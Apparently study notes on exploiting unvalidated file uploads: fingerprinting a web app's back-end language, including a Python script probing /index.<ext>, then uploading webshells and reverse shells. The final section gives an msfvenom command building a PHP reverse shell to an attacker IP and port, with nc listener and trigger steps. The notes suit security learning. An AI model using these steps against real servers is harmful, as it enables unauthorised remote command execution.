
Basic Exploitation

Absent Validation

  • the upload form accepts any type of file, so the first test is whether we can upload a script the server will execute
  • usually we upload a webshell or a reverse shell to test this
  • For a webshell:
    • we need to upload/write a webshell in the same language the back end runs.
    • the language can often be read from the file extension of the page we are on (e.g. /index.php).
  • When the web framework uses routes, the extension is not visible in the URL
    • file upload exploitation is also different in this case, since our uploaded files may not be directly routable or accessible.
    • one way to determine what language runs the web application is to visit the /index.ext page, swapping ext for common web extensions like php, asp, aspx, jsp, among others, to see whether any of them exist.
    • we can fuzz this with Burp Intruder using this wordlist - https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt
    • not always accurate: an app with a catch-all route may answer 200 to every extension, so the probe then proves nothing
    • We can also use https://www.wappalyzer.com/ (browser extension) to fingerprint the stack
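The /index.ext probe above, as an added example (not code from the original notes): it requests /index.&lt;ext&gt; for each extension, treats 200 and 403 as "the file exists", and returns no guess when every extension answers, which is the catch-all-route case that makes this check unreliable. The extension list is a constructed subset of SecLists' web-extensions.txt, and the target URL, timeout and User-Agent are assumptions.

```python
"""Guess the back-end language of a routed web app by probing /index.<ext>.

Added example, not code from the original notes. It assumes the target is
reachable over HTTP and that the extension list below (a constructed subset
of SecLists' web-extensions.txt) is representative; pass the full wordlist
for a real engagement.
"""
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional

# Constructed subset of Discovery/Web-Content/web-extensions.txt (SecLists).
WEB_EXTENSIONS: List[str] = [
    ".php", ".asp", ".aspx", ".jsp", ".jspx", ".cgi", ".pl", ".py", ".rb",
    ".html", ".htm",
]

# Extensions that actually say something about the server-side language.
# .html/.htm are probed too but only show that static files are served.
EXT_TO_LANGUAGE: Dict[str, str] = {
    ".php": "PHP",
    ".asp": "ASP (classic)",
    ".aspx": "ASP.NET",
    ".jsp": "Java (JSP)",
    ".jspx": "Java (JSP)",
    ".cgi": "CGI (Perl/C/shell)",
    ".pl": "Perl",
    ".py": "Python",
    ".rb": "Ruby",
}

# A fetcher maps a URL to an HTTP status code (0 = connection failed).
Fetcher = Callable[[str], int]


def http_status(url: str, timeout: float = 5.0) -> int:
    """GET url and return its status code; 0 on a network error."""
    req = urllib.request.Request(url, headers={"User-Agent": "ext-probe"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:  # 4xx/5xx still carry a status
        return err.code
    except urllib.error.URLError:
        return 0


def probe_index(base_url: str, extensions: List[str] = WEB_EXTENSIONS,
                fetch: Fetcher = http_status) -> Dict[str, int]:
    """Request /index<ext> for every extension and record the status code."""
    base = base_url.rstrip("/")
    return {ext: fetch(f"{base}/index{ext}") for ext in extensions}


def guess_language(statuses: Dict[str, int]) -> Optional[str]:
    """Return the language implied by the first server-side extension that exists.

    200 and 403 both count as "the file is there" (403 usually means the
    server knows the file but refuses to serve it). If every extension hits,
    the app almost certainly has a catch-all route and the probe tells us
    nothing: that is the "not always accurate" case from the notes.
    """
    hits = [ext for ext, code in statuses.items() if code in (200, 403)]
    if hits and len(hits) == len(statuses):
        return None
    for ext in hits:
        if ext in EXT_TO_LANGUAGE:
            return EXT_TO_LANGUAGE[ext]
    return None


if __name__ == "__main__":
    # usage: python probe_ext.py http://target  (assumed target URL)
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1"
    found = probe_index(target)
    for ext, code in found.items():
        print(f"{code:>3}  {target.rstrip('/')}/index{ext}")
    print("language guess:", guess_language(found) or "unknown (try Wappalyzer)")
```

The `fetch` parameter exists so the logic can be exercised without a network; in use, leave it at the default and point the script at the target.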

Upload Exploitation

  • use the SecLists Web-Shells collection (https://github.com/danielmiessler/SecLists/tree/master/Web-Shells)
  • phpbash.php - a terminal-like interactive PHP webshell
  • Custom webshells using GET: a one-liner that runs whatever command is passed in a GET parameter
  • Reverse shells:
    • https://github.com/pentestmonkey/php-reverse-shell
    • SecLists
    • change the IP/port in the script to our attack box
    • start a nc listener on our attack box before browsing to the uploaded file
  • Custom reverse shells
    • msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
    • upload reverse.php, start the listener, then visit the uploaded file to trigger the connection back